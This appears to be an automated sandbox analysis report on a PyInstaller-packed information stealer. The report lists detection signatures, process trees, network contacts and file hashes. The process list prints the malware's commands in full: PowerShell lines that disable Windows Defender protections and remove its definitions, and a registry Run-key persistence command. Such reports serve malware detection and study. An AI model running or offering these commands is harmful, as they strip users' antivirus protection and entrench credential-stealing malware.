N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat" C:\Windows\system32\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A
N/A ip-api.com N/A N/A
N/A ipapi.co N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4480 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Users\Admin\AppData\Local\Temp\discboost.exe
PID 4480 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Users\Admin\AppData\Local\Temp\discboost.exe
PID 3612 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 480 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 480 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\System32\wbem\WMIC.exe
PID 3612 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\System32\wbem\WMIC.exe
PID 480 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 480 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1524 wrote to memory of 1240 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1524 wrote to memory of 1240 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1144 wrote to memory of 3140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1144 wrote to memory of 3140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2808 wrote to memory of 3260 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 3260 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1560 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 1560 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 1684 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 1684 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 232 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 232 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 232 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 232 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4444 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4444 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 232 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 232 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4776 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4776 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 232 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 232 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 2848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1120 wrote to memory of 2848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 232 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 232 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4436 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4436 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 232 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 232 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 3972 wrote to memory of 1144 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 3972 wrote to memory of 1144 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 232 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 232 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 3404 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 232 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 232 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 4100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3784 wrote to memory of 4100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 232 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 232 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 1104 wrote to memory of 2456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1104 wrote to memory of 2456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 232 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 232 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\discboost.exe

"C:\Users\Admin\AppData\Local\Temp\discboost.exe"

C:\Users\Admin\AppData\Local\Temp\discboost.exe

"C:\Users\Admin\AppData\Local\Temp\discboost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\discboost.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\discboost.exe'

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"

C:\Windows\system32\reg.exe

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

Network

Country Destination Domain Proto
US 8.8.8.8:53 blank-jwlqx.in udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 104.26.8.44:443 ipapi.co tcp
US 162.159.137.232:443 discord.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 104.16.124.96:443 www.cloudflare.com tcp
US 104.26.8.44:443 ipapi.co tcp
US 104.16.124.96:443 www.cloudflare.com tcp
US 104.26.8.44:443 ipapi.co tcp
US 104.16.124.96:443 www.cloudflare.com tcp
US 104.26.8.44:443 ipapi.co tcp
US 162.159.137.232:443 discord.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI44802\python310.dll

MD5 178a0f45fde7db40c238f1340a0c0ec0
SHA1 dcd2d3d14e06da3e8d7dc91a69b5fd785768b5fe
SHA256 9fcb5ad15bd33dd72122a171a5d950e8e47ceda09372f25df828010cde24b8ed
SHA512 4b790046787e57b9414a796838a026b1530f497a75c8e62d62b56f8c16a0cbedbefad3d4be957bc18379f64374d8d3bf62d3c64b53476c7c5005a7355acd2cee

C:\Users\Admin\AppData\Local\Temp\_MEI44802\VCRUNTIME140.dll

MD5 870fea4e961e2fbd00110d3783e529be
SHA1 a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA256 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA512 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

memory/3612-26-0x00007FFC04BD0000-0x00007FFC0503E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI44802\base_library.zip

MD5 5bf257cce4b4a29fa20ddc5bc6889973
SHA1 2c9a24a961b5c475a77a1460e48bdc2b0c3e79ad
SHA256 f55752b907702ff162760809519315c278b013f84ff8f4b001268b84fedd70ae
SHA512 2e188c87cca4c398c9144aa9330a6420f14c2b45c12f49dfe378240c51143f9f0c115dec307420f94bb1aad0f91b1775b8102e78899f13cf36f076626c9f3216

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_ctypes.pyd

MD5 813fc3981cae89a4f93bf7336d3dc5ef
SHA1 daff28bcd155a84e55d2603be07ca57e3934a0de
SHA256 4ac7fb7b354069e71ebf7fcc193c0f99af559010a0ad82a03b49a92deb0f4d06
SHA512 ce93f21b315d96fde96517a7e13f66aa840d4ad1c6e69e68389e235e43581ad543095582ebcb9d2c6dda11c17851b88f5b1ed1d59d354578fe27e7299bbea1cc

C:\Users\Admin\AppData\Local\Temp\_MEI44802\libffi-7.dll

MD5 6f818913fafe8e4df7fedc46131f201f
SHA1 bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
SHA256 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
SHA512 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

memory/3612-31-0x00007FFC1BC60000-0x00007FFC1BC84000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI44802\blank.aes

MD5 9d7da69c4538f5cf8ac83f2291940f96
SHA1 0e61945d7f25cd448d938b793868c042b7e92ca9
SHA256 00d0e262de5e4756166cdd9cc25ce61f3a42cf3f1f95db7ea1f00d27f1074e25
SHA512 51b751ec825f36959c41543b79549aa9983266b0e659d94578a4b90614e7682dc1daa699e128206c1307b90bd188f32d08e927c29dc1a1fa7d59917fb3b23798

memory/3612-50-0x00007FFC1C6B0000-0x00007FFC1C6BF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_ssl.pyd

MD5 081c878324505d643a70efcc5a80a371
SHA1 8bef8336476d8b7c5c9ef71d7b7db4100de32348
SHA256 fcb70b58f94f5b0f9d027999cce25e99ddcc8124e4ddcc521cb5b96a52faaa66
SHA512 c36293b968a2f83705815ef3a207e444eeb7667ad9af61df75e85151f74f2fe0a299b3b1349de0d410bbbaea9f99cac5228189099a221de5fa1e20c97c648e32

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_sqlite3.pyd

MD5 bb4aa2d11444900c549e201eb1a4cdd6
SHA1 ca3bb6fc64d66deaddd804038ea98002d254c50e
SHA256 f44d80ab16c27ca65da23ae5fda17eb842065f3e956f10126322b2ea3ecdf43f
SHA512 cd3c5704e5d99980109fdc505d39ad5b26a951685e9d8e3fed9e0848cd44e24cc4611669dbdb58acc20f1f4a5c37d5e01d9d965cf6fe74f94da1b29aa2ff6931

